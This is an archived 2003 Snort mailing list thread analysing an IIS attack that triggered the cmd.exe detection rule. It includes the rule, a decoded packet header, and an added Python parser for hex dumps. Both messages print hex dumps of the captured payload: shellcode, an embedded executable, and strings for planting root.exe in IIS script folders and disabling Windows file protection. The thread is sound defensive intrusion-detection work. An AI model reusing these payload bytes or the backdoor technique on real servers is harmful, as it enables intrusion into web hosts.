Snort mailing list archives

Re: different CMD.exe access?!?


From: Phil Wood <cpw () cynosure lanl gov>
Date: Tue, 11 Mar 2003 12:08:13 -0700

Short answer: Yes.  And, they are coming from Portugal and other countries as
              well.

Long answer (with a request for additional information that should be included
             in all queries of this type)

Attention all snort users.  It will save at least three more emails on this
subject and any other subject if all of you folks, young and old, veterans
and newbies alike include the following in your email (examples relate to my OS):

1. SNORT VERSION:
   % snort -V
   Initializing Output Plugins!

   -*> Snort! <*-
   Version 2.0.0beta (Build 57)
   By Martin Roesch (roesch () sourcefire com, www.snort.org)

2. THE RULE:
   % grep "sid:[ ]*xxxx[ ]*;" rules/*.rules (where xxxx is the SID)
   rules/web-iis.rules:alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
   (msg:"WEB-IIS cmd.exe access"; flow:to_server,established; content:"cmd.exe";
   nocase; classtype:web-application-attack; sid:1002;  rev:5;)

3. OPERATING SYSTEM:
   % uname -s
   Linux

4. TRACE (home grown from pcap file)

04:23:07.301975 219.240.31.43.52417 > 10.0.191.179.80: . 2014:3462(1448) ack 1 win 17520 <nop,nop,timestamp 903573427 2054612915> (DF)

              RFC791: INTERNET PROTOCOL, September 1981  
   0                   1                   2                   3
   0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  | VER=4 | IHL=5 | ROU | | | | | | Total Length = 1500           |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  | Identification = 10807        | |D| | Fragment Offset = 0     |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  |    TTL=50     | Protocol = 6  | Header Checksum = 21526       |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  | Source Address  = 219.240.31.43                               |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  | Destination Address  = 10.0.191.179                           |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        RFC793: TRANSMISSION CONTROL PROTOCOL, September 1981
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  | Source Port = 52417           | Destination Port = 80         |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  | Sequence Number = 840894308                                   |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  | Acknowledgment Number = 1533835227                            |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  | OFF=8 | | | | | | | |A| | | | |  Window = 17520               |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  | Checksum = 33332              | Urgent Pointer = 0            |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
                               Options
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  |     0x01      |     0x01      |     0x08      |     0x0a      |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  |     0x35      |     0xdb      |     0x6f      |     0xb3      |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  |     0x7a      |     0x76      |     0xe7      |     0xb3      |
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
                                Data
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  :  73457800  ff7590ff  55f88945  8cc38b45    : sEx  u  U  E   E :
  :  8469c005  84080840  8945848d  84047856    :  i     @ E    xV :
  :  3412f7d8  c1c008c3  e8e1ffff  ff3c0074    : 4            < t :
  :  f73cff74  f3c3e8ed  ffffff8a  f8e8e6ff    :  < t             :
  :  ffff8ad8  c1e310e8  dcffffff  8af8e8d5    :                  :
  :  ffffff8a  d8e8b4ff  ffff83e0  07e82000    :                  :
  :  0000ffff  ffff00ff  ffff00ff  ffff00ff    :                  :
  :  ffff00ff  ffff0000  ffff0000  ffff0000    :                  :
  :  ffff598b  048123d8  f7d02385  58feffff    :   Y   #   # X    :
  :  0bd880fb  7f749f80  fbe0749a  3b9d58fe    :      t    t ; X  :
  :  ffff7492  c3680401  00008d85  5cfeffff    :   t  h      \    :
  :  50ff55e0  8dbc055c  feffffe8  09000000    : P U    \         :
  :  5c434d44  2e455845  005efca5  a5a4b363    : \CMD.EXE ^     c :
  :  6a01e81c  00000064  3a5c696e  65747075    : j      d:\inetpu :
  :  625c7363  72697074  735c726f  6f742e65    : b\scripts\root.e :
  :  7865008b  0c248819  8d855cfe  ffff50ff    : xe   $    \   P  :
  :  55dc6a01  e82b0000  00643a5c  70726f67    : U j  +   d:\prog :
  :  72617e31  5c636f6d  6d6f6e7e  315c7379    : ra~1\common~1\sy :
  :  7374656d  5c4d5341  44435c72  6f6f742e    : stem\MSADC\root. :
  :  65786500  8b0c2488  198d855c  feffff50    : exe   $    \   P :
  :  ff55dce8  ba050000  fc4d5a50  00020000    :  U       MZP     :
  :  0004000f  00ffff00  00b80000  00000000    :                  :
  :  0040001a  fc000001  fcfcfcfc  fcfc0000    :  @               :
  :  50450000  4c010300  fd2a2529  00000000    : PE  L    *%)     :
  :  00000000  e0008f81  0b010219  00040000    :                  :
  :  00080000  00000000  00100000  00100000    :                  :
  :  00200000  00004000  00100000  00040000    :       @          :
  :  01000000  00000000  03000a00  00000000    :                  :
  :  00400000  00040000  00000000  02000000    :  @               :
  :  00001000  00200000  00001000  00100000    :                  :
  :  00000000  10000000  00000000  00000000    :                  :
  :  00300000  0c01fcfc  fc000000  00000000    :  0               :
  :  00000000  00000000  00000000  00000000    :                  :
  :  00000000  10000000  10000000  04000000    :                  :
  :  08000000  00000000  00000000  00000020    :                  :
  :  00006000  00000000  00000000  10000000    :   `              :
  :  20000000  04000000  0c000000  00000000    :                  :
  :  00000000  00000040  0000c000  00000000    :        @         :
  :  00000000  10000000  30000000  04000000    :         0        :
  :  10000000  00000000  00000000  00000040    :                @ :
  :  0000c0fc  fcfcfcfc  fcfcfcfc  fcfcfcfc    :                  :
  :  fcfcfcfc  fcfcfcfc  fcfcfcfc  fcfcfcfc    :                  :
  :  fcfcfcfc  fcfcfcfc  fcfcfcfc  fcfcfc00    :                  :
  :  00000000  00000000  00000000  00000068    :                h :
  :  04010000  68d02040  00e86101  00008db8    :     h  @  a      :
  :  d0204000  be002040  00a5a5a5  a56a0168    :   @    @     j h :
  :  d0204000  e84c0100  00e80c00  000068c0    :   @  L        h  :
  :  270900e8  31010000  ebef68d8  24400068    : '   1     h $@ h :
  :  3f000f00  6a006810  20400068  02000080    : ?   j h  @ h     :
  :  e8320100  000bc075  266a0468  54204000    :  2     u&j hT @  :
  :  6a046a00  68482040  00ff35d8  244000e8    : j j hH @  5 $@   :
  :  0d010000  ff35d824  4000e80e  01000068    :      5 $@      h :
  :  d8244000  683f000f  006a0068  58204000    :  $@ h?   j hX @  :
  :  68020000  80e8ed00  00000bc0  7555bd9c    : h           uU   :
  :  204000e8  4c000000  bda82040  00e84200    :  @  L      @  B  :
  :  00006a09  68b82040  006a016a  0068b020    :   j h  @ j j h   :
  :  4000ff35  d8244000  e8b40000  006a0968    : @  5 $@      j h :
  :  c4204000  6a016a00  68b42040  00ff35d8    :   @ j j h  @  5  :
  :  244000e8  99000000  ff35d824  4000e89a    : $@       5 $@    :
  :  000000c3  c705d024  40000004  000068d0    :        $@     h  :
  :  24400068  d0204000  68d42440  006a0055    : $@ h  @ h $@ j U :
  :  ff35d824  4000e860  0000000b  c07549a1    :  5 $@  `     uI  :
  :  d0244000  0bc07440  bed02040  00803e00    :  $@   t@   @  >  :
  :  74364666  817efe2c  2c75f2c7  06323137    : t6Ff ~ ,,u   217 :
  :  0081eecc  20400089  35d02440  00ff35d0    :      @  5 $@  5  :
  :  24400068  d0204000  6a016a00  55ff35d8    : $@ h  @ j j U 5  :
  :  244000e8  19000000  c3ff2560  304000ff    : $@        %`0@   :
  :  25643040  00ff2568  304000ff  25703040    : %d0@  %h0@  %p0@ :
  :  00ff2574  304000ff  25783040  00ff257c    :   %t0@  %x0@  %| :
  :  3040fcfc  fcfcfcfc  fcfcfcfc  fcfcfcfc    : 0@               :
  :  fcfcfcfc  fc000000  00000000  00000000    :                  :
  :  00005c45  58504c4f  5245522e  45584500    :   \EXPLORER.EXE  :
  :  0000534f  46545741  52455c4d  6963726f    :   SOFTWARE\Micro :
  :  736f6674  5c57696e  646f7773  204e545c    : soft\Windows NT\ :
  :  43757272  656e7456  65727369  6f6e5c57    : CurrentVersion\W :
  :  696e6c6f  676f6e00  00005346  43446973    : inlogon   SFCDis :
  :  61626c65  00009dff  ffff5359  5354454d    : able      SYSTEM :
  :  5c437572  72656e74  436f6e74  726f6c53    : \CurrentControlS :
  :  65745c53  65727669  6365735c  57335356    : et\Services\W3SV :
  :  435c5061  72616d65  74657273  5c566972    : C\Parameters\Vir :
  :  7475616c  20526f6f  74730000  00002f53    : tual Roots    /S :
  :  63726970  74730000  00002f4d  53414443    : cripts    /MSADC :
  :  00002f43  00002f44  0000633a  5c2c2c32    :   /C  /D  c:\,,2 :
  :  31370000  0000643a  5c2c2c32  3137fcfc    : 17    d:\,,217   :
  :  fcfcfcfc  fcfcfcfc  fcfcfcfc  fcfcfcfc    :                  :
  :  fcfcfcfc  fcfcfc00  00000000  00000000    :                  :
  :  00000000  00000000  0000003c  30000000    :            <0    :
  :  00000000  00000084  30000060  3000004c    :         0  `0  L :
  :  30000000  00000000  00000091  30000070    : 0           0  p :
  :  30000000  00000000  00000000  00000000    : 0                :
  :  00000000  0000009e                        :                  :
  +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+


On Tue, Mar 11, 2003 at 10:58:50AM -0500, John Hally wrote:

Hello,

This is a different looking trace that tripped on the CMD.EXE rule.  I
usually see a bunch of ../../../cmd.exe, but this one looks different.
Anyone else seeing this?  It originated from 219.240.31.44, over in Korea:


000 : 61 6D 65 00 FF 75 BC FF 55 F8 89 45 98 E8 10 00   ame..u..U..E....
010 : 00 00 57 53 41 47 65 74 4C 61 73 74 45 72 72 6F   ..WSAGetLastErro
020 : 72 00 FF 75 BC FF 55 F8 89 45 94 E8 0B 00 00 00   r..u..U..E......
030 : 55 53 45 52 33 32 2E 44 4C 4C 00 FF 55 F4 89 45   USER32.DLL..U..E
040 : 90 E8 0E 00 00 00 45 78 69 74 57 69 6E 64 6F 77   ......ExitWindow
050 : 73 45 78 00 FF 75 90 FF 55 F8 89 45 8C C3 8B 45   sEx..u..U..E...E
060 : 84 69 C0 05 84 08 08 40 89 45 84 8D 84 04 78 56   .i.....@.E....xV
070 : 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF FF FF 3C 00 74   4............<.t
080 : F7 3C FF 74 F3 C3 E8 ED FF FF FF 8A F8 E8 E6 FF   .<.t............
090 : FF FF 8A D8 C1 E3 10 E8 DC FF FF FF 8A F8 E8 D5   ................
0a0 : FF FF FF 8A D8 E8 B4 FF FF FF 83 E0 07 E8 20 00   .............. .
0b0 : 00 00 FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF   ................
0c0 : FF FF 00 FF FF FF 00 00 FF FF 00 00 FF FF 00 00   ................
0d0 : FF FF 59 8B 04 81 23 D8 F7 D0 23 85 58 FE FF FF   ..Y...#...#.X...
0e0 : 0B D8 80 FB 7F 74 9F 80 FB E0 74 9A 3B 9D 58 FE   ....t....t.;.X.
0f0 : FF FF 74 92 C3 68 04 01 00 00 8D 85 5C FE FF FF   ..t..h......\...
100 : 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 00 00   P.U....\........
110 : 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 B3 63   \CMD.EXE.^.....c
120 : 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 70 75   j......d:\inetpu
130 : 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 2E 65   b\scripts\root.e
140 : 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 FF   xe...$....\...P.
150 : 55 DC 6A 01 E8 2B 00 00 00 64 3A 5C 70 72 6F 67   U.j..+...d:\prog
160 : 72 61 7E 31 5C 63 6F 6D 6D 6F 6E 7E 31 5C 73 79   ra~1\common~1\sy
170 : 73 74 65 6D 5C 4D 53 41 44 43 5C 72 6F 6F 74 2E   stem\MSADC\root.
180 : 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50   exe...$....\...P
190 : FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02 00 00   .U.......MZP....
1a0 : 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00   ................
1b0 : 00 40 00 1A FC 00 00 01 FC FC FC FC FC FC 00 00   .@..............
1c0 : 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00 00 00   PE..L....*%)....
1d0 : 00 00 00 00 E0 00 8F 81 0B 01 02 19 00 04 00 00   ................
1e0 : 00 08 00 00 00 00 00 00 00 10 00 00 00 10 00 00   ................
1f0 : 00 20 00 00 00 00 40 00 00 10 00 00 00 04 00 00   . ....@.........
200 : 01 00 00 00 00 00 00 00 03 00 0A 00 00 00 00 00   ................
210 : 00 40 00 00 00 04 00 00 00 00 00 00 02 00 00 00   .@..............
220 : 00 00 10 00 00 20 00 00 00 00 10 00 00 10 00 00   ..... ..........
230 : 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00   ................
240 : 00 30 00 00 0C 01 FC FC FC 00 00 00 00 00 00 00   .0..............
250 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
260 : 00 00 00 00 10 00 00 00 10 00 00 00 04 00 00 00   ................
270 : 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20   ............... 
280 : 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00   ..`.............
290 : 20 00 00 00 04 00 00 00 0C 00 00 00 00 00 00 00    ...............
2a0 : 00 00 00 00 00 00 00 40 00 00 C0 00 00 00 00 00   .......@........
2b0 : 00 00 00 00 10 00 00 00 30 00 00 00 04 00 00 00   ........0.......
2c0 : 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40   ...............@
2d0 : 00 00 C0 FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
2e0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
2f0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00   ................
300 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68   ...............h
310 : 04 01 00 00 68 D0 20 40 00 E8 61 01 00 00 8D B8   ....h. @..a.....
320 : D0 20 40 00 BE 00 20 40 00 A5 A5 A5 A5 6A 01 68   . @... @.....j.h
330 : D0 20 40 00 E8 4C 01 00 00 E8 0C 00 00 00 68 C0   . @..L........h.
340 : 27 09 00 E8 31 01 00 00 EB EF 68 D8 24 40 00 68   '...1.....h.$@.h
350 : 3F 00 0F 00 6A 00 68 10 20 40 00 68 02 00 00 80   ?...j.h. @.h....
360 : E8 32 01 00 00 0B C0 75 26 6A 04 68 54 20 40 00   .2.....u&j.hT @.
370 : 6A 04 6A 00 68 48 20 40 00 FF 35 D8 24 40 00 E8   j.j.hH @..5.$@..
380 : 0D 01 00 00 FF 35 D8 24 40 00 E8 0E 01 00 00 68   .....5.$@......h
390 : D8 24 40 00 68 3F 00 0F 00 6A 00 68 58 20 40 00   .$@.h?...j.hX @.
3a0 : 68 02 00 00 80 E8 ED 00 00 00 0B C0 75 55 BD 9C   h...........uU..
3b0 : 20 40 00 E8 4C 00 00 00 BD A8 20 40 00 E8 42 00    @..L..... @..B.
3c0 : 00 00 6A 09 68 B8 20 40 00 6A 01 6A 00 68 B0 20   ..j.h. @.j.j.h. 
3d0 : 40 00 FF 35 D8 24 40 00 E8 B4 00 00 00 6A 09 68   @..5.$@......j.h
3e0 : C4 20 40 00 6A 01 6A 00 68 B4 20 40 00 FF 35 D8   . @.j.j.h. @..5.
3f0 : 24 40 00 E8 99 00 00 00 FF 35 D8 24 40 00 E8 9A   $@.......5.$@...
400 : 00 00 00 C3 C7 05 D0 24 40 00 00 04 00 00 68 D0   .......$@.....h.
410 : 24 40 00 68 D0 20 40 00 68 D4 24 40 00 6A 00 55   $@.h. @.h.$@.j.U
420 : FF 35 D8 24 40 00 E8 60 00 00 00 0B C0 75 49 A1   .5.$@..`.....uI.
430 : D0 24 40 00 0B C0 74 40 BE D0 20 40 00 80 3E 00   .$@...t@.. @..>.
440 : 74 36 46 66 81 7E FE 2C 2C 75 F2 C7 06 32 31 37   t6Ff.~.,,u...217
450 : 00 81 EE CC 20 40 00 89 35 D0 24 40 00 FF 35 D0   .... @..5.$@..5.
460 : 24 40 00 68 D0 20 40 00 6A 01 6A 00 55 FF 35 D8   $@.h. @.j.j.U.5.
470 : 24 40 00 E8 19 00 00 00 C3 FF 25 60 30 40 00 FF   $@........%`0@..
480 : 25 64 30 40 00 FF 25 68 30 40 00 FF 25 70 30 40   %d0@..%h0@..%p0@
490 : 00 FF 25 74 30 40 00 FF 25 78 30 40 00 FF 25 7C   ..%t0@..%x0@..%|
4a0 : 30 40 FC FC FC FC FC FC FC FC FC FC FC FC FC FC   0@..............
4b0 : FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00   ................
4c0 : 00 00 5C 45 58 50 4C 4F 52 45 52 2E 45 58 45 00   ..\EXPLORER.EXE.
4d0 : 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F   ..SOFTWARE\Micro
4e0 : 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C   soft\Windows NT\
4f0 : 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 57   CurrentVersion\W
500 : 69 6E 6C 6F 67 6F 6E 00 00 00 53 46 43 44 69 73   inlogon...SFCDis
510 : 61 62 6C 65 00 00 9D FF FF FF 53 59 53 54 45 4D   able......SYSTEM
520 : 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53   \CurrentControlS
530 : 65 74 5C 53 65 72 76 69 63 65 73 5C 57 33 53 56   et\Services\W3SV
540 : 43 5C 50 61 72 61 6D 65 74 65 72 73 5C 56 69 72   C\Parameters\Vir
550 : 74 75 61 6C 20 52 6F 6F                           tual Roo



-------------------------------------------------------
This SF.net email is sponsored by:Crypto Challenge is now open! 
Get cracking and register here for some mind boggling fun and 
the chance of winning an Apple iPod:
http://ads.sourceforge.net/cgi-bin/redirect.pl?thaw0031en
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list

-- 
Phil Wood, cpw () lanl gov
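As an added example (not code from the thread or from Snort), the following Python decodes a hex dump in the "OFF : XX XX ... ascii" row layout quoted above and applies the sid:1002 content match to it. It shows why this trace trips the rule without any ../../cmd.exe URL: the rule's content:"cmd.exe"; nocase; matches the upper-case \CMD.EXE string embedded in the binary payload, and the same match with nocase removed would not fire. The sample rows are copied from the quoted dump; SAMPLE_DUMP, parse_dump, find_content, printable_strings and analyse are names chosen here.

```python
import re

HEX = set("0123456789abcdefABCDEF")

# Constructed sample in the same "OFF : XX XX ... ascii" layout as the quoted
# trace, using the rows around \CMD.EXE from the post.
SAMPLE_DUMP = r"""
100 : 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 00 00   P.U....\........
110 : 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 B3 63   \CMD.EXE.^.....c
120 : 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 70 75   j......d:\inetpu
130 : 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 2E 65   b\scripts\root.e
140 : 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 FF   xe...$....\...P.
"""

def parse_dump_line(line):
    """Parse one 'OFF : XX XX ... ascii' row; return (offset, bytes) or None.
    Only the hex column is decoded; list archives rewrite the ASCII column."""
    off, sep, rest = line.partition(":")
    off = off.strip()
    if not sep or not off or not set(off) <= HEX:
        return None
    data = bytearray()
    for tok in rest.split()[:16]:          # at most 16 bytes per row
        if len(tok) != 2 or not set(tok) <= HEX:
            break                           # reached the ASCII column
        data.append(int(tok, 16))
    return int(off, 16), bytes(data)

def parse_dump(text):
    """Concatenate all rows; return (offset of first row, payload bytes)."""
    rows = [r for r in map(parse_dump_line, text.splitlines()) if r]
    if not rows:
        return None, b""
    return rows[0][0], b"".join(r[1] for r in rows)

def find_content(payload, content, nocase=True):
    """Mimic Snort's content:"..." [nocase]: byte-wise search, optionally
    case-insensitive for ASCII letters. Returns the offset or -1."""
    hay, needle = (payload.lower(), content.lower()) if nocase else (payload, content)
    return hay.find(needle)

def printable_strings(payload, min_len=4):
    """Runs of printable ASCII, as the strings(1) tool would report them."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, payload)]

def analyse(dump_text, content=b"cmd.exe"):
    """Absolute offset of the rule's content match plus the readable strings."""
    base, payload = parse_dump(dump_text)
    rel = find_content(payload, content)
    return {"bytes": len(payload),
            "match_offset": None if rel < 0 else base + rel,
            "strings": printable_strings(payload)}
```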


